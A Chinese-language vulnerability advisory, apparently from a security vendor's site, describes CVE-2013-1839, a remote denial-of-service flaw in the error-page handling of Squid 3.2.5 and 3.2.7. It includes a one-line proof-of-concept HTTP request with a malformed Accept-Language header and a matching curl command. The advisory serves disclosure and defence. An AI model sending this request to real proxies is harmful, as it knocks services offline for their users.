安全研究
安全漏洞
安全漏洞
所有系统
AIX
BSD(eg,OpenBSD)
Digital Unix
HP-UX
IRIX
Linux
FreeBSD
SCO UNIX
SunOS
Solaris
Windows
所有类型
远程进入系统
本地越权访问
拒绝服务攻击
嵌入恶意代码
Web数据接口
其他类型
Squid errorpage.cc 'strHdrAcptLangGetItem()'函数远程拒绝服务漏洞
发布日期:
2013-03-05
更新日期:
2013-03-07
受影响系统:
Squid Squid 3.2.7
Squid Squid 3.2.5
描述:
BUGTRAQ ID:
58316
CVE(CAN) ID:
CVE-2013-1839
Squid是一个高效的Web缓存及代理程序。
Squid 3.2.5、3.2.7在函数'strHdrAcptLangGetItem()'的实现上存在安全漏洞,此漏洞仅在squid生成错误页面时可以触发。成功利用后可允许远程攻击者造成死循环,触发拒绝服务。该错误仅在squid需要生成错误页面时才会被触发。
<*来源:tytusromekiatomek (
tytusromekiatomek@hushmail.com
)
链接:
http://seclists.org/fulldisclosure/2013/Mar/59
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
tytusromekiatomek (
tytusromekiatomek@hushmail.com
)提供了如下测试方法:
POC (request):
-- cut --
GET
http://127.0.0.1:1/foo
HTTP/1.1
Accept-Language: ,
-- cut --
e.g : curl -H "Accept-Language: ,"
http://localhost:3129/
建议:
厂商补丁:
Squid
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.squid-cache.org/Advisories/
浏览次数:
3877
严重程度:
0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客